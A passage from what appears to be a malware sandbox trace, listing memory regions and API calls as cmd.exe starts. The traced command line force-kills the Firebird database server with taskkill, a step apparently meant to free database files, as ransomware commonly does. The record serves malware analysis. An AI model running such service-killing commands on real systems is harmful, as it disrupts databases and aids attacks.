0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0f0000" filename = "" Region: id = 5296 start_va = 0x7f11b000 end_va = 0x7f11dfff entry_point = 0x0 region_type = private name = "private_0x000000007f11b000" filename = "" Region: id = 5297 start_va = 0x7f11e000 end_va = 0x7f11efff entry_point = 0x0 region_type = private name = "private_0x000000007f11e000" filename = "" Region: id = 5298 start_va = 0x7f11f000 end_va = 0x7f11ffff entry_point = 0x0 region_type = private name = "private_0x000000007f11f000" filename = "" Region: id = 5299 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5300 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5301 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 5302 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5303 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 5304 start_va = 0x45b0000 end_va = 0x45bffff entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 5305 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5306 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5307 start_va = 0x45e0000 end_va = 0x46dffff entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 5308 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5349 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 5350 start_va = 0x4570000 end_va = 0x45affff entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 5351 start_va = 0x46e0000 end_va = 0x479dfff entry_point = 0x46e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5352 start_va = 0x47a0000 end_va = 0x489ffff entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 5353 start_va = 0x4900000 end_va = 0x490ffff entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 5354 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5355 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5356 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5357 start_va = 0x7eff0000 end_va = 0x7f0effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eff0000" filename = "" Region: id = 5358 start_va = 0x7f118000 end_va = 0x7f11afff entry_point = 0x0 region_type = private name = "private_0x000000007f118000" filename = "" Region: id = 5359 start_va = 0x370000 end_va = 0x373fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 5360 start_va = 0x380000 end_va = 0x383fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 5361 start_va = 0x4910000 end_va = 0x4c46fff entry_point = 0x4910000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 345 os_tid = 0xd44 [0125.163] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0125.163] __set_app_type (_Type=0x1) [0125.163] __p__fmode () returned 0x77ac4d6c [0125.163] __p__commode () returned 0x77ac5b1c [0125.163] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0125.164] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0125.164] GetCurrentThreadId () returned 0xd44 [0125.164] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd44) returned 0x84 [0125.164] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0125.164] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0125.164] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.167] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.167] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x454fad8 | out: phkResult=0x454fad8*=0x0) returned 0x2 [0125.167] VirtualQuery (in: lpAddress=0x454fadf, lpBuffer=0x454fa90, dwLength=0x1c | out: lpBuffer=0x454fa90*(BaseAddress=0x454f000, AllocationBase=0x4450000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0125.167] VirtualQuery (in: lpAddress=0x4450000, lpBuffer=0x454fa90, dwLength=0x1c | out: lpBuffer=0x454fa90*(BaseAddress=0x4450000, AllocationBase=0x4450000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0125.167] VirtualQuery (in: lpAddress=0x4451000, lpBuffer=0x454fa90, dwLength=0x1c | out: lpBuffer=0x454fa90*(BaseAddress=0x4451000, AllocationBase=0x4450000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0125.167] VirtualQuery (in: lpAddress=0x4453000, lpBuffer=0x454fa90, dwLength=0x1c | out: lpBuffer=0x454fa90*(BaseAddress=0x4453000, AllocationBase=0x4450000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0125.167] VirtualQuery (in: lpAddress=0x4550000, lpBuffer=0x454fa90, dwLength=0x1c | out: lpBuffer=0x454fa90*(BaseAddress=0x4550000, AllocationBase=0x4550000, AllocationProtect=0x2, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0125.167] GetConsoleOutputCP () returned 0x1b5 [0125.168] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0125.168] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0125.168] _get_osfhandle (_FileHandle=1) returned 0x3c [0125.168] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0125.168] _get_osfhandle (_FileHandle=1) returned 0x3c [0125.168] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0125.168] _get_osfhandle (_FileHandle=1) returned 0x3c [0125.168] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0125.169] _get_osfhandle (_FileHandle=0) returned 0x38 [0125.169] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0125.169] _get_osfhandle (_FileHandle=0) returned 0x38 [0125.169] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0125.169] GetEnvironmentStringsW () returned 0x45e7d88* [0125.169] FreeEnvironmentStringsA (penv="A") returned 1 [0125.169] GetEnvironmentStringsW () returned 0x45e7d88* [0125.169] FreeEnvironmentStringsA (penv="A") returned 1 [0125.169] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x454ea3c | out: phkResult=0x454ea3c*=0x94) returned 0x0 [0125.170] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x454ea40, lpData=0x454ea48, lpcbData=0x454ea44*=0x1000 | out: lpType=0x454ea40*=0x0, lpData=0x454ea48*=0xe8, lpcbData=0x454ea44*=0x1000) returned 0x2 [0125.170] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x454ea40, lpData=0x454ea48, lpcbData=0x454ea44*=0x1000 | out: lpType=0x454ea40*=0x4, lpData=0x454ea48*=0x1, lpcbData=0x454ea44*=0x4) returned 0x0 [0125.170] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x454ea40, lpData=0x454ea48, lpcbData=0x454ea44*=0x1000 | out: lpType=0x454ea40*=0x0, lpData=0x454ea48*=0x1, lpcbData=0x454ea44*=0x1000) returned 0x2 [0125.170] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x454ea40, lpData=0x454ea48, lpcbData=0x454ea44*=0x1000 | out: lpType=0x454ea40*=0x4, lpData=0x454ea48*=0x0, lpcbData=0x454ea44*=0x4) returned 0x0 [0125.170] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x454ea40, lpData=0x454ea48, lpcbData=0x454ea44*=0x1000 | out: lpType=0x454ea40*=0x4, lpData=0x454ea48*=0x40, lpcbData=0x454ea44*=0x4) returned 0x0 [0125.170] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x454ea40, lpData=0x454ea48, lpcbData=0x454ea44*=0x1000 | out: lpType=0x454ea40*=0x4, lpData=0x454ea48*=0x40, lpcbData=0x454ea44*=0x4) returned 0x0 [0125.170] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x454ea40, lpData=0x454ea48, lpcbData=0x454ea44*=0x1000 | out: lpType=0x454ea40*=0x0, lpData=0x454ea48*=0x40, lpcbData=0x454ea44*=0x1000) returned 0x2 [0125.170] RegCloseKey (hKey=0x94) returned 0x0 [0125.170] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x454ea3c | out: phkResult=0x454ea3c*=0x94) returned 0x0 [0125.170] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x454ea40, lpData=0x454ea48, lpcbData=0x454ea44*=0x1000 | out: lpType=0x454ea40*=0x0, lpData=0x454ea48*=0x40, lpcbData=0x454ea44*=0x1000) returned 0x2 [0125.170] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x454ea40, lpData=0x454ea48, lpcbData=0x454ea44*=0x1000 | out: lpType=0x454ea40*=0x4, lpData=0x454ea48*=0x1, lpcbData=0x454ea44*=0x4) returned 0x0 [0125.170] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x454ea40, lpData=0x454ea48, lpcbData=0x454ea44*=0x1000 | out: lpType=0x454ea40*=0x0, lpData=0x454ea48*=0x1, lpcbData=0x454ea44*=0x1000) returned 0x2 [0125.170] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x454ea40, lpData=0x454ea48, lpcbData=0x454ea44*=0x1000 | out: lpType=0x454ea40*=0x4, lpData=0x454ea48*=0x0, lpcbData=0x454ea44*=0x4) returned 0x0 [0125.170] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x454ea40, lpData=0x454ea48, lpcbData=0x454ea44*=0x1000 | out: lpType=0x454ea40*=0x4, lpData=0x454ea48*=0x9, lpcbData=0x454ea44*=0x4) returned 0x0 [0125.170] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x454ea40, lpData=0x454ea48, lpcbData=0x454ea44*=0x1000 | out: lpType=0x454ea40*=0x4, lpData=0x454ea48*=0x9, lpcbData=0x454ea44*=0x4) returned 0x0 [0125.170] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x454ea40, lpData=0x454ea48, lpcbData=0x454ea44*=0x1000 | out: lpType=0x454ea40*=0x0, lpData=0x454ea48*=0x9, lpcbData=0x454ea44*=0x1000) returned 0x2 [0125.170] RegCloseKey (hKey=0x94) returned 0x0 [0125.170] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2982e [0125.170] srand (_Seed=0x5ad2982e) [0125.170] GetCommandLineW () returned="/c taskkill \\/IM fb_inet_server.exe \\/F" [0125.170] GetCommandLineW () returned="/c taskkill \\/IM fb_inet_server.exe \\/F" [0125.170] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0125.171] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x45e9ce0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0125.171] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0125.171] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0125.171] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0125.171] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0125.171] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0125.171] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0125.171] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0125.171] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0125.171] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0125.171] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0125.171] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0125.171] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0125.171] GetEnvironmentStringsW () returned 0x45e7d88* [0125.171] FreeEnvironmentStringsA (penv="A") returned 1 [0125.171] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0125.171] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0125.171] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0125.171] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0125.171] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0125.171] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0125.171] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0125.171] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0125.172] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0125.172] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0125.172] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x454f814 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0125.172] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x454f814, lpFilePart=0x454f80c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x454f80c*="Desktop") returned 0x1d [0125.172] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0125.172] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x454f590 | out: lpFindFileData=0x454f590) returned 0x45e05c8 [0125.172] FindClose (in: hFindFile=0x45e05c8 | out: hFindFile=0x45e05c8) returned 1 [0125.172] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x454f590 | out: lpFindFileData=0x454f590) returned 0x45e05c8 [0125.172] FindClose (in: hFindFile=0x45e05c8 | out: hFindFile=0x45e05c8) returned 1 [0125.172] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0125.172] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x454f590 | out: lpFindFileData=0x454f590) returned 0x45e05c8 [0125.172] FindClose (in: hFindFile=0x45e05c8 | out: hFindFile=0x45e05c8) returned 1 [0125.173] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0125.173] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0125.173] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0125.173] GetEnvironmentStringsW () returned 0x45e7d88* [0125.173] FreeEnvironmentStringsA (penv="=") returned 1 [0125.173] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0125.173] GetConsoleOutputCP () returned 0x1b5 [0125.174] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0125.174] GetUserDefaultLCID () returned 0x409 [0125.174] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0125.174] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x454f944, cchData=128 | out: lpLCData="0") returned 2 [0125.174] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x454f944, cchData=128 | out: lpLCData="0") returned 2 [0125.174] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x454f944, cchData=128 | out: lpLCData="1") returned 2 [0125.174] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0125.174] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0125.174] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0125.174] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0125.174] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0125.174] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0125.174] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0125.174] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0125.174] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0125.174] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0125.174] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0125.175] GetConsoleTitleW (in: lpConsoleTitle=0x45eaa08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0125.176] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0125.176] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0125.176] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0125.176] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0125.177] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0125.177] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0125.177] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0125.177] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0125.177] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0125.177] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0125.177] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0125.178] GetConsoleTitleW (in: lpConsoleTitle=0x454f630, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0125.178] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0125.179] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0125.179] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0125.179] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0125.179] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0125.179] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0125.179] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0125.179] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0125.179] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0125.179] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0125.179] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0125.179] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0125.179] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0125.179] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0125.179] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0125.179] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0125.179] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0125.179] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0125.179] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0125.179] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0125.179] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0125.179] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0125.179] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0125.179] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0125.179] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0125.179] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0125.179] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0125.179] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0125.179] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0125.179] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0125.179] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0125.179] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0125.179] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0125.179] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0125.179] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0125.179] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0125.179] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0125.179] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0125.180] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0125.180] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0125.180] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0125.180] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0125.180] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0125.180] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0125.180] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0125.180] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0125.180] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0125.180] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0125.180] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0125.180] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0125.180] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0125.180] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0125.180] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0125.180] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0125.180] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0125.180] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0125.180] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0125.180] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0125.180] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0125.180] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0125.180] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0125.180] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0125.180] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0125.180] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0125.180] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0125.180] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0125.180] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0125.180] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0125.180] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0125.180] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0125.180] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0125.180] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0125.180] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0125.180] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0125.180] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0125.181] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0125.181] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0125.181] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0125.181] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0125.181] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0125.181] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0125.181] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0125.181] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0125.181] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0125.181] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0125.181] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0125.181] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0125.181] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0125.182] SetErrorMode (uMode=0x0) returned 0x0 [0125.182] SetErrorMode (uMode=0x1) returned 0x0 [0125.182] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x45eaf78, lpFilePart=0x454f13c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x454f13c*="Desktop") returned 0x1d [0125.182] SetErrorMode (uMode=0x0) returned 0x1 [0125.182] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: 